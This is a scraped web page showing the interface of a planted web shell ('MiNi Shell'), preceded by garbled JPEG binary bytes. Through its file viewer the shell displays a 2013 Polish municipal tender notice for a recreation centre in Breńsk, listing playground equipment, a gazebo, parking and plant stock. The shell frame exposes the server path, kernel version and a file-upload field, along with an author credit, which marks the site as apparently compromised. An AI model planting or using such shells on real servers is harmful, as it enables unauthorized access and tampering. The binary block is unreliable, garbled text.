JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130311/96882-N-2013.html

<p class="kh_header"><b>Rzeczenica: Budowa centrum rekreacyjno-wypoczynkowego w Breńsku</b><br>
<b>Numer ogłoszenia: 96882 - 2013; data zamieszczenia: 11.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rzeczenica , ul. Człuchowska 26, 77-304 Rzeczenica.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wrotapomorza.pl/pl/bip/gminy/rzeczenica/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa centrum rekreacyjno-wypoczynkowego w Breńsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane i dostawy polegające na budowie centrum rekreacyjno - wypoczynkowego w Breńsku w ramach projektu współfinansowanego ze środków Europejskiego  Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach PROW 2007-2013 

Zakres zamówienia:
Część 1 zamówienia:
1.	Zestaw placu zabaw z podbudową - strefą bezpieczeństwa: - wieża z dachem sześciokątnym i schodami kręconymi, -	pomost sześciokątny, -	schody kręcone, -	zjeżdżalnia, - drabinka wejściowa, -	pomost prosty, - 	przeplotnia wspinaczkowa, - 	drabinka pozioma, -	zjazd strażacki
Urządzenia powinny być zgodne z Polskimi Normami oraz z warunkami bezpieczeństwa określonymi w szczególności w przepisach o ogólnym bezpieczeństwie produktów oraz przepisach w sprawie bezpieczeństwa i higieny. Dostarczony i zainstalowany sprzęt powinien być zgodny z normą PN-EN 1176, a nawierzchnia - z normą PN-EN 1177.

Część 2 zamówienia:
1.	Platforma: powierzchnia - ośmiobok foremny - 7,73 m2
2.	Altana: powierzchnia - 19,63 m2
3.	Parking: szer. 5 m, miejsca parkingowe szt.6, zlokalizowane w kącie 90°, wjazd i wyjazd z drogi powiatowej, powierzchnia 113 m2
4.	Ławka wolnostojąca - 3 szt., 	wymiary całkowite dł. 1, 7 m, szer. 0,65 m, wys. 0,86, konstrukcja drewniana  z oparciem
5.	Lampy solarne - 2 szt. -	jednoramienna lampa parkowa ze słupem stalowym pokrytym tworzywem sztucznym, wysokość min. 3,3 m, źródło światła: min. 2 żarówki LED 5W, strumień świetlny: min. 850 LM, czas pracy lampy min. 8h, czas autonomii:               do 4 dni, moc paneli: min. 100W, pojemność akumulatora: min. 44Ah,                      typ akumulatora: żelowy
6.	Kosze na śmieci - szt. 3, kosze drewniane na metalowym stelażu

Część 3 zamówienia:
1.	Materiał roślinny
a) DRZEWA IGLASTE I LIŚCIASTE
- Świerk pospolity -Picea abies, wys. 3-4m, 3 szt.                               
- Świerk kłujący srebrny -Picea pungens glauca, wys. 3-4 m, 1 szt.
- Świerk serbski - Picea omorica, wys. 3-4 m, 4 szt.
- Brzoza brodawkowata - Purpurea, Betula pendula, obwód 14-16 cm, 3 szt.
- Jarząb pospolity - Fastigiata, Sorbus aucuparia, obwód 14-16 cm, 1 szt.

b) KRZEWY LIŚCIASTE
- Dereń biały - Spaethii, Cornus alba, 5l, 50 szt.
- Kalina koralowa - Roseum, Viburnum opulus, 5l, 14 szt.
- Berberys - Thunberga, Atropurpurea, Berberis thunbergii, 5l, 37 szt.
- Jaśminowiec wonny - Philadelphus coronarius, 5l, 30 szt.
- Bez czarny - Black Lace Eva, Sambucus nigra, 5l, 20 szt.
- Tawuła gęstokwiatowa - Spiraea densiflora, 5l, 16 szt.
- Tawuła brzozolistna - Spiraea betulifolia, 5l, 14 szt.
- Lilak pospolity - Charles Joly,  Syringa vulgaris, 5l, 5 szt.
- Lilak pospolity - Mme Lemoine, Syringa vulgaris, 5l, 5 szt.
- Pęcherznica kalinolistna - Aurea, Physocarpus opulifolius, 5l, 20 szt.

c) KRZEWY IGLASTE
- Sosna kosodrzewina  - Pinus mugo, 5l, 52 szt.
- Jałowiec pośredni - Mint Julep,  Juniperus x media, 5l, 7 szt

d) BYLINY
- Funkia sp. ulistnienie zielono-białe - Hosta sp., 3-5l, 200 szt.
- Rudbekia błyskotliwa -Goldstrum, Rudbeckia fulgida, 3-5l, 70 szt.
- Szałwia omszona - kwiatostany fioletowe  - Salvia nemorosa, 3-5l, 70 szt.

e) nasiona traw - nasiona mieszanki uniwersalnej - 25 kg
f) nawóz N:P:K - wieloskładnikowy nawóz mineralny zawierający azot, fosfor i potas              w postaci przyswajalnej przez rośliny - 80 kg
g) ziemia urodzajna - Humus - 40 m3

Dostarczony materiał roślinny powinien być zgodny z normą PN-87/R-67023 i PN-87/R-67022 oraz zaleceniami jakościowymi dla ozdobnego materiału szkółkarskiego.
a) rośliny powinny być w pierwszym wyborze, jednolite w całej partii, zdrowe, bez oznak chorób grzybowych i szkodników.
b) drzewa powinny być dobrze rozgałęzione, o wyglądzie charakterystycznym dla danego gatunku z bryłą korzeniową dobrze wykształconą i przerośniętą.
c) krzewy powinny posiadać właściwie wykształcone pędy główne, co najmniej 3 z typowymi dla odmiany rozgałęzieniami, z dobrze wykształconą i przerośniętą bryłą korzeniową.
d) byliny powinny posiadać dobrze rozwiniętą część nadziemną, bryłę korzeniową właściwie wykształconą. Korzenie nie mogą zawijać się w pojemniku.

TRANSPORT MATERIAŁU ROŚLINNEGO
1. Koszt transportu i rozładunku wliczony jest w cenę materiału roślinnego.
2. Wykonawca własnym transportem dostarczy materiał roślinny na miejsce sadzenia  w terminie uzgodnionym z Zamawiającym.
3. Wykonawca powinien zabezpieczyć rośliny w czasie transportu przed uszkodzeniami i niekorzystnymi warunkami atmosferycznymi - rośliny powinny być ocienione, osłonięte             od wiatru    i zabezpieczone przed wysychaniem.
4. Jeżeli podczas odbioru materiału roślinnego zostaną stwierdzone jego wady, Zamawiający może odmówić przyjęcia materiału roślinnego, a kosztami odbioru wadliwego materiału i jego wymianą na wolny od wad zostanie obciążony Wykonawca.
5. Na dostarczony materiał roślinny Wykonawca udziela Zamawiającemu minimum dwunastomiesięcznej gwarancji.

Szczegółowy opis przedmiotu zamówienia zawiera:
a) projekt budowlany, stanowiący Załącznik nr 7 do SIWZ
c) przedmiary robót, stanowiące Załącznik nr 8 do SIWZ - materiały pomocnicze.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.33.00-9, 45.21.13.20-8, 45.21.21.40-9, 45.22.38.00-4, 45.31.61.00-6, 03.12.00.00-8, 03.45.20.00-3, 03.45.13.00-9, 03.44.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wraz z ofertą składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Pzp, albo informację o tym, że nie należy do grupy kapitałowej - według wzoru stanowiącego Załącznik nr 4 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do złożonej oferty i na niżej wymienionych warunkach:
1. w stosunku do terminu realizacji umowy:
a)	zmiany spowodowane warunkami atmosferycznymi, geologicznymi, archeologicznymi, 
2.	Zmiana sposobu spełnienia świadczenia - zmiany technologiczne, w szczególności:
a)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
b)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających                   na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy,
c)	konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji,                 w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem robót,
d)	konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa. 
3.	  Pozostałe zmiany: 
a)	inna niż wymienione siła wyższa zdarzenie zewnętrzne, niemożliwe do przewidzenia  i do zapobieżenia uniemożliwiające wykonanie przedmiotu umowy zgodnie z SIWZ                i dokumentacją.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotapomorza.pl/pl/bip/gminy/rzeczenica/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rzeczenica
ul. Człuchowska 26
77-304 Rzeczenica
pok. nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2013 godzina 10:00, miejsce: Urząd Gminy Rzeczenica
ul. Człuchowska 26
77-304 Rzeczenica
Sekretariat - pok. nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego  Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach PROW 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa centrum rekreacyjno-wypoczynkowego w Breńsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw placu zabaw z podbudową (strefą bezpieczeństwa)
- wieża z dachem sześciokątnym i schodami kręconymi
- pomost sześciokątny
- schody kręcone
- zjeżdżalnia
- drabinka wejściowa 
- pomost prosty
- przeplotnia wspinaczkowa
- drabinka pozioma
- zjazd strażacki
Urządzenia powinny być zgodne z Polskimi Normami oraz z warunkami bezpieczeństwa określonymi w szczególności w przepisach o ogólnym bezpieczeństwie produktów oraz przepisach w sprawie bezpieczeństwa i higieny. Dostarczony i zainstalowany sprzęt powinien być zgodny z normą PN-EN 1176, a nawierzchnia - z normą PN-EN 1177.
Szczegółowy opis przedmiotu zamówienia zawiera:
a) projekt budowlany, stanowiący Załącznik nr 7 do SIWZ
c) przedmiar robót, stanowiący Załącznik nr 8 do SIWZ (materiały pomocnicze).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.21.40-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa centrum rekreacyjno - wypoczynkowego w Breńsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Platforma
- powierzchnia (ośmiobok foremny) - 7,73 m2
2.	Altana
- powierzchnia - 19,63 m2
3.	Parking
- szer. 5 m, miejsca parkingowe szt.6, zlokalizowane w kącie 90°, wjazd i wyjazd z drogi powiatowej, powierzchnia 113 m2
4.	Ławka wolnostojąca - 3 szt.
- Wymiary całkowite dł. 1, 7 m, szer. 0,65 m, wys. 0,86, konstrukcja drewniana  z oparciem
5.	Lampy solarne - 2 szt.
- Jednoramienna lampa parkowa ze słupem stalowym pokrytym tworzywem sztucznym, wysokość min. 3,3 m, źródło światła: min. 2 żarówki LED 5W, strumień świetlny: min. 850 LM, czas pracy lampy min. 8h, czas autonomii:               do 4 dni, moc paneli: min. 100W, pojemność akumulatora: min. 44Ah,                      typ akumulatora: żelowy
6.	Kosze na śmieci - szt. 3, kosze drewniane na metalowym stelażu
Szczegółowy opis przedmiotu zamówienia zawiera:
a) projekt budowlany, stanowiący Załącznik nr 7 do SIWZ
b) przedmiary robót, stanowiące Załącznik nr 8 do SIWZ (materiały pomocnicze).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.33.00-9, 45.21.13.20-8, 45.22.38.00-4, 45.31.61.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa centrum rekreacyjno - wypoczynkowego w Breńsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiał roślinny
a) DRZEWA IGLASTE I LIŚCIASTE
- Świerk pospolity - Picea abies, wys. 3-4m, 3 szt.                               
- Świerk kłujący srebrny - Picea pungens glauca, wys. 3-4 m, 1 szt.
- Świerk serbski - Picea omorica, wys. 3-4 m, 4 szt.
- Brzoza brodawkowata - Purpurea, Betula pendula, obwód 14-16 cm, 3 szt.
- Jarząb pospolity - Fastigiata, Sorbus aucuparia, obwód 14-16 cm, 1 szt.

b) KRZEWY LIŚCIASTE
- Dereń biały - Spaethii, Cornus alba, 5l, 50 szt.
- Kalina koralowa - Roseum,  Viburnum opulus, 5l, 14 szt.
- Berberys Thunberga, Atropurpurea, Berberis thunbergii, 5l, 37 szt.
- Jaśminowiec wonny - Philadelphus coronarius, 5l, 30 szt.
- Bez czarny - Black Lace Eva, Sambucus nigra, 5l, 20 szt.
- Tawuła gęstokwiatowa, Spiraea densiflora, 5l, 16 szt.
- Tawuła brzozolistna, Spiraea betulifolia, 5l, 14 szt.
- Lilak pospolity - Charles Joly, Syringa vulgaris, 5l, 5 szt.
- Lilak pospolity - Mme Lemoine, Syringa vulgaris, 5l, 5 szt.
- Pęcherznica kalinolistna   - Aurea,  Physocarpus opulifolius, 5l, 20 szt.

c) KRZEWY IGLASTE
- Sosna kosodrzewina - Pinus mugo, 5l, 52 szt.
- Jałowiec pośredni - Mint Julep,  Juniperus x media, 5l, 7 szt

d) BYLINY
- Funkia sp. ulistnienie zielono-białe  - Hosta sp., 3-5l, 200 szt.
- Rudbekia błyskotliwa - Goldstrum, Rudbeckia fulgida, 3-5l, 70 szt.
- Szałwia omszona - kwiatostany fioletowe , Salvia nemorosa, 3-5l, 70 szt.

e) nasiona traw -nasiona mieszanki uniwersalnej - 25 kg
f) nawóz N:P:K wieloskładnikowy nawóz mineralny zawierający azot, fosfor i potas              w postaci przyswajalnej przez rośliny - 80 kg
g) ziemia urodzajna - Humus - 40 m3

Dostarczony materiał roślinny powinien być zgodny z normą PN-87/R-67023 i PN-87/R-67022 oraz zaleceniami jakościowymi dla ozdobnego materiału szkółkarskiego.
a) rośliny powinny być w pierwszym wyborze, jednolite w całej partii, zdrowe, bez oznak chorób grzybowych i szkodników.
b) drzewa powinny być dobrze rozgałęzione, o wyglądzie charakterystycznym dla danego gatunku z bryłą korzeniową dobrze wykształconą i przerośniętą.
c) krzewy powinny posiadać właściwie wykształcone pędy główne (najmniej 3) z typowymi dla odmiany rozgałęzieniami, z dobrze wykształconą i przerośniętą bryłą korzeniową.
d) byliny powinny posiadać dobrze rozwiniętą część nadziemną, bryłę korzeniową właściwie wykształconą. Korzenie nie mogą zawijać się w pojemniku.

TRANSPORT MATERIAŁU ROŚLINNEGO
1. Koszt transportu i rozładunku wliczony jest w cenę materiału roślinnego.
2. Wykonawca własnym transportem dostarczy materiał roślinny na miejsce sadzenia                       w terminie uzgodnionym z Zamawiającym.
3. Wykonawca powinien zabezpieczyć rośliny w czasie transportu przed uszkodzeniami                           i niekorzystnymi warunkami atmosferycznymi - rośliny powinny być ocienione, osłonięte             od wiatru    i zabezpieczone przed wysychaniem.
4. Jeżeli podczas odbioru materiału roślinnego zostaną stwierdzone jego wady, Zamawiający może odmówić przyjęcia materiału roślinnego, a kosztami odbioru wadliwego materiału                   i jego wymianą na wolny od wad zostanie obciążony Wykonawca.
5. Na dostarczony materiał roślinny Wykonawca udziela Zamawiającemu minimum dwunastomiesięcznej gwarancji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.00.00-8, 03.45.20.00-3, 03.45.13.00-9, 03.44.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com